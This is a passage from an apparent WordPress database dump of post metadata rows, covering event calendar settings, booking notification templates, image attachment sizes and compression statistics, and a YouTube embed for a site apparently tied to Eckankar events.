/>\r\n%%blog_name%%</p>\";}}'),(174811,267624,'passster_activate_global_protection',NULL),(174812,267624,'passster_activate_protection',NULL),(174813,267624,'passster_protection_type','password'),(174816,267624,'_dp_original','266104'),(174815,267624,'boldgrid_in_page_containers','1'),(174817,267624,'_edit_lock','1673461774:2'),(174818,267624,'_edit_last','2'),(174819,267624,'_thumbnail_id','266658'),(174820,267626,'_edit_lock','1675450223:2'),(174821,267626,'_edit_last','2'),(174822,267626,'boldgrid_hide_page_title','0'),(174823,267626,'boldgrid_in_page_containers','1'),(174824,267639,'_edit_lock','1673554753:2'),(174825,267639,'_edit_last','2'),(176947,267918,'mec_public','1'),(176948,267918,'mec_start_date','2023-02-15'),(176949,267918,'mec_start_time_hour','5'),(176950,267918,'mec_start_time_minutes','30'),(176951,267918,'mec_start_time_ampm','PM'),(176952,267918,'mec_start_day_seconds','63000'),(176953,267918,'mec_end_date','2023-02-15'),(176954,267918,'mec_end_time_hour','6'),(176955,267918,'mec_end_time_minutes','30'),(176956,267918,'mec_end_time_ampm','PM'),(176957,267918,'mec_end_day_seconds','66600'),(176958,267918,'mec_repeat_status','0'),(176959,267918,'mec_repeat_type',''),(176960,267918,'mec_repeat_interval','1'),(176961,267918,'mec_repeat_end',''),(176962,267918,'mec_repeat_end_at_occurrences',''),(176963,267918,'mec_repeat_end_at_date',''),(176964,267918,'mec_advanced_days','a:0:{}'),(176965,267918,'mec_in_days',''),(176966,267918,'mec_not_in_days',''),(176967,267918,'mec_hourly_schedules','a:0:{}'),(176968,267918,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(174828,267639,'boldgrid_hide_page_title','0'),(174829,267639,'boldgrid_in_page_containers','1'),(176945,267918,'mec_timezone','global'),(176946,267918,'mec_countdown_method','global'),(176944,267918,'mec_comment',''),(176942,267918,'mec_hide_time','0'),(176943,267918,'mec_hide_end_time','0'),(176938,267918,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(176939,267918,'mec_certain_weekdays','a:0:{}'),(176940,267918,'mec_allday','0'),(176941,267918,'one_occurrence','0'),(174834,267647,'_edit_lock','1675458276:2'),(174835,267647,'_edit_last','2'),(174836,267648,'_wp_attached_file','2023/01/hiker-path-1.jpg'),(174837,267648,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:744;s:6:\"height\";i:425;s:4:\"file\";s:24:\"2023/01/hiker-path-1.jpg\";s:8:\"filesize\";i:123119;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"hiker-path-1-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17576;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"hiker-path-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8513;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:24:\"hiker-path-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30907;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:24:\"hiker-path-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49239;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:24:\"hiker-path-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33133;}s:8:\"tileview\";a:5:{s:4:\"file\";s:24:\"hiker-path-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40712;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(174838,267648,'original-file','2023/01/hiker-path-1-updraft-pre-smush-original.jpg'),(174839,267648,'smush-complete','1'),(174840,267648,'smush-info','The file was compressed from 120.23 KB to 113.18 KB saving 5.86 percent using WP-Optimize'),(174841,267648,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:123119;s:12:\"smushed-size\";i:115900;s:15:\"savings-percent\";d:5.86;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:123119;s:10:\"compressed\";i:115900;}s:6:\"medium\";a:2:{s:8:\"original\";i:17576;s:10:\"compressed\";i:17225;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8513;s:10:\"compressed\";i:8447;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:30907;s:10:\"compressed\";i:29906;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:49239;s:10:\"compressed\";i:47853;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:33133;s:10:\"compressed\";i:32203;}s:8:\"tileview\";a:2:{s:8:\"original\";i:40712;s:10:\"compressed\";i:39244;}}}'),(174842,267647,'boldgrid_hide_page_title','0'),(174843,267647,'boldgrid_in_page_containers','1'),(174844,267653,'_edit_lock','1676523475:2'),(174845,267653,'_edit_last','2'),(177003,267919,'mec_cost',''),(177004,267919,'mec_currency','a:0:{}'),(176981,267918,'mec_cancelled_reason',''),(176982,267918,'mec_display_cancellation_reason_in_single_page',''),(176983,267918,'boldgrid_hide_page_title','0'),(176984,267918,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(176985,267918,'passster_activate_global_protection',NULL),(176986,267918,'passster_activate_protection',NULL),(176987,267918,'passster_protection_type','password'),(176988,267918,'boldgrid_in_page_containers','1'),(176990,267918,'_dp_original','267696'),(176991,267918,'_edit_lock','1675867726:15'),(176992,267918,'_edit_last','15'),(176993,267918,'_thumbnail_id','266083'),(176994,267919,'protect_children',''),(176995,267919,'mec_color',''),(176996,267919,'mec_location_id','118'),(176997,267919,'mec_dont_show_map','0'),(176998,267919,'mec_organizer_id','1'),(176999,267919,'mec_read_more',''),(177000,267919,'mec_more_info',''),(177001,267919,'mec_more_info_title',''),(177002,267919,'mec_more_info_target','_self'),(176980,267918,'mec_moved_online_link',''),(176979,267918,'mec_event_status','EventScheduled'),(176977,267918,'mec_op','a:0:{}'),(176978,267918,'mec_fields','a:0:{}'),(176969,267918,'mec_tickets','a:0:{}'),(176970,267918,'mec_fees_global_inheritance','1'),(176971,267918,'mec_fees','a:0:{}'),(176972,267918,'mec_ticket_variations_global_inheritance','1'),(176973,267918,'mec_ticket_variations','a:0:{}'),(176974,267918,'mec_reg_fields_global_inheritance','1'),(176975,267918,'mec_reg_fields','a:0:{}'),(176976,267918,'mec_bfixed_fields','a:0:{}'),(174852,267653,'boldgrid_hide_page_title','0'),(174853,267653,'boldgrid_in_page_containers','1'),(174854,267664,'boldgrid_hide_page_title','0'),(174855,267664,'boldgrid_in_page_containers','1'),(174856,267664,'_dp_original','267653'),(174857,267664,'_edit_lock','1673569696:2'),(174858,267665,'boldgrid_hide_page_title','0'),(174859,267665,'boldgrid_in_page_containers','1'),(174860,267665,'_dp_original','267647'),(174861,267665,'_edit_lock','1675468976:2'),(174862,267665,'_edit_last','2'),(174863,267667,'_wp_attached_file','2023/01/esc-sun-lensflare-1.jpg'),(174864,267667,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:454;s:4:\"file\";s:31:\"2023/01/esc-sun-lensflare-1.jpg\";s:8:\"filesize\";i:23955;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"esc-sun-lensflare-1-300x272.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9052;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"esc-sun-lensflare-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3533;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:31:\"esc-sun-lensflare-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9882;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:31:\"esc-sun-lensflare-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14708;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:31:\"esc-sun-lensflare-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10673;}s:8:\"tileview\";a:5:{s:4:\"file\";s:31:\"esc-sun-lensflare-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11961;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(174865,267664,'_edit_last','2'),(174866,267667,'original-file','2023/01/esc-sun-lensflare-1-updraft-pre-smush-original.jpg'),(174867,267667,'smush-complete','1'),(174868,267667,'smush-info','The file was compressed from 23.39 KB to 22.17 KB saving 5.25 percent using WP-Optimize'),(174869,267667,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:23955;s:12:\"smushed-size\";i:22698;s:15:\"savings-percent\";d:5.25;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:23955;s:10:\"compressed\";i:22698;}s:6:\"medium\";a:2:{s:8:\"original\";i:9052;s:10:\"compressed\";i:8986;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3533;s:10:\"compressed\";i:3467;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:9882;s:10:\"compressed\";i:9816;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:14708;s:10:\"compressed\";i:14708;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:10673;s:10:\"compressed\";i:10673;}s:8:\"tileview\";a:2:{s:8:\"original\";i:11961;s:10:\"compressed\";i:11961;}}}'),(175432,267708,'_wp_attached_file','2023/01/waterfall-with-text.jpg'),(175433,267708,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:770;s:6:\"height\";i:433;s:4:\"file\";s:31:\"2023/01/waterfall-with-text.jpg\";s:8:\"filesize\";i:131245;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"waterfall-with-text-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20971;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"waterfall-with-text-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9874;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"waterfall-with-text-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106929;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:31:\"waterfall-with-text-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32916;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:31:\"waterfall-with-text-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54440;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:31:\"waterfall-with-text-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38114;}s:8:\"tileview\";a:5:{s:4:\"file\";s:31:\"waterfall-with-text-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39421;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(174894,267570,'_oembed_17282f16a653c991eb4e3d6f9f01f652','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>'),(174895,267570,'_oembed_time_17282f16a653c991eb4e3d6f9f01f652','1673635234'),(174876,267672,'_wp_attached_file','2023/01/waterfall-2-cropped.jpg'),(174877,267672,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1346;s:6:\"height\";i:530;s:4:\"file\";s:31:\"2023/01/waterfall-2-cropped.jpg\";s:8:\"filesize\";i:166488;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"waterfall-2-cropped-300x118.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:118;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12177;}s:5:\"large\";a:5:{s:4:\"file\";s:32:\"waterfall-2-cropped-1024x403.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90482;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"waterfall-2-cropped-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7019;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"waterfall-2-cropped-768x302.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:302;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56433;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:31:\"waterfall-2-cropped-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20484;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:31:\"waterfall-2-cropped-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34605;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:31:\"waterfall-2-cropped-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25015;}s:8:\"tileview\";a:5:{s:4:\"file\";s:31:\"waterfall-2-cropped-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23797;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177426,268017,'original-file','2023/02/for-adding-full-email-junk-updraft-pre-smush-original.png'),(174888,267672,'original-file','2023/01/waterfall-2-cropped-updraft-pre-smush-original.jpg'),(174889,267672,'smush-complete','1'),(174890,267672,'smush-info','The file was compressed from 162.59 KB to 158.20 KB saving 2.7 percent using WP-Optimize'),(174891,267672,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:166488;s:12:\"smushed-size\";i:161999;s:15:\"savings-percent\";d:2.7;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:166488;s:10:\"compressed\";i:161999;}s:6:\"medium\";a:2:{s:8:\"original\";i:12177;s:10:\"compressed\";i:12057;}s:5:\"large\";a:2:{s:8:\"original\";i:90482;s:10:\"compressed\";i:89826;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7019;s:10:\"compressed\";i:6953;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:56433;s:10:\"compressed\";i:55840;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:20484;s:10:\"compressed\";i:20484;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:34605;s:10:\"compressed\";i:34514;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:25015;s:10:\"compressed\";i:24968;}s:8:\"tileview\";a:2:{s:8:\"original\";i:23797;s:10:\"compressed\";i:23797;}}}'),(177427,268017,'smush-complete','1'),(177428,268017,'smush-info','The file was compressed from 38.80 KB to 19.83 KB saving 48.88 percent using WP-Optimize'),(177429,268017,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:39728;s:12:\"smushed-size\";i:20310;s:15:\"savings-percent\";d:48.88;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:39728;s:10:\"compressed\";i:20310;}s:6:\"medium\";a:2:{s:8:\"original\";i:8584;s:10:\"compressed\";i:4757;}s:5:\"large\";a:2:{s:8:\"original\";i:55448;s:10:\"compressed\";i:22018;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5146;s:10:\"compressed\";i:3157;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:37540;s:10:\"compressed\";i:15156;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:15038;s:10:\"compressed\";i:7277;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:24895;s:10:\"compressed\";i:10811;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:18691;s:10:\"compressed\";i:8593;}s:8:\"tileview\";a:2:{s:8:\"original\";i:18855;s:10:\"compressed\";i:8389;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:89834;s:10:\"compressed\";i:35173;}}}'),(174900,267687,'_wp_attached_file','2023/01/activities-sound-of-soul-events-2023.jpg'),(174901,267687,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:230;s:6:\"height\";i:153;s:4:\"file\";s:48:\"2023/01/activities-sound-of-soul-events-2023.jpg\";s:8:\"filesize\";i:15600;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"activities-sound-of-soul-events-2023-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8774;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(174902,267687,'original-file','2023/01/activities-sound-of-soul-events-2023-updraft-pre-smush-original.jpg'),(174903,267687,'smush-complete','1'),(174904,267687,'smush-info','The file was compressed from 15.23 KB to 14.43 KB saving 5.29 percent using WP-Optimize'),(174905,267687,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:15600;s:12:\"smushed-size\";i:14775;s:15:\"savings-percent\";d:5.29;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:15600;s:10:\"compressed\";i:14775;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8774;s:10:\"compressed\";i:8708;}}}'),(174906,267692,'protect_children',''),(174907,267692,'mec_color',''),(174908,267692,'mec_location_id','118'),(174909,267692,'mec_dont_show_map','0'),(174910,267692,'mec_organizer_id','1'),(174911,267692,'mec_read_more',''),(174912,267692,'mec_more_info',''),(174913,267692,'mec_more_info_title',''),(174914,267692,'mec_more_info_target','_self'),(174915,267692,'mec_cost',''),(174916,267692,'mec_currency','a:0:{}'),(174917,267692,'mec_additional_organizer_ids','a:0:{}'),(174918,267692,'mec_additional_location_ids','a:0:{}'),(174919,267692,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-01-26\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-01-26\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(174920,267692,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(174921,267692,'mec_certain_weekdays','a:0:{}'),(174922,267692,'mec_allday','0'),(174923,267692,'one_occurrence','0'),(174924,267692,'mec_hide_time','0'),(174925,267692,'mec_hide_end_time','0'),(174926,267692,'mec_comment',''),(174927,267692,'mec_timezone','global'),(174928,267692,'mec_countdown_method','global'),(174929,267692,'mec_public','1'),(174930,267692,'mec_start_date','2023-01-26'),(174931,267692,'mec_start_time_hour','2'),(174932,267692,'mec_start_time_minutes','0'),(174933,267692,'mec_start_time_ampm','PM'),(174934,267692,'mec_start_day_seconds','50400'),(174935,267692,'mec_end_date','2023-01-26'),(174936,267692,'mec_end_time_hour','3'),(174937,267692,'mec_end_time_minutes','0'),(174938,267692,'mec_end_time_ampm','PM'),(174939,267692,'mec_end_day_seconds','54000'),(174940,267692,'mec_repeat_status','0'),(174941,267692,'mec_repeat_type',''),(174942,267692,'mec_repeat_interval','1'),(174943,267692,'mec_repeat_end',''),(174944,267692,'mec_repeat_end_at_occurrences',''),(174945,267692,'mec_repeat_end_at_date',''),(174946,267692,'mec_advanced_days','a:0:{}'),(174947,267692,'mec_in_days',''),(174948,267692,'mec_not_in_days',''),(174949,267692,'mec_hourly_schedules','a:0:{}'),(174950,267692,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(174951,267692,'mec_tickets','a:0:{}'),(174952,267692,'mec_fees_global_inheritance','1'),(174953,267692,'mec_fees','a:0:{}'),(174954,267692,'mec_ticket_variations_global_inheritance','1'),(174955,267692,'mec_ticket_variations','a:0:{}'),(174956,267692,'mec_reg_fields_global_inheritance','1'),(174957,267692,'mec_reg_fields','a:0:{}'),(174958,267692,'mec_bfixed_fields','a:0:{}'),(174959,267692,'mec_op','a:0:{}'),(174960,267692,'mec_fields','a:0:{}'),(174961,267692,'mec_event_status','EventScheduled'),(174962,267692,'mec_moved_online_link',''),(174963,267692,'mec_cancelled_reason',''),(174964,267692,'mec_display_cancellation_reason_in_single_page',''),(174965,267692,'boldgrid_hide_page_title','0'),(174966,267692,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br 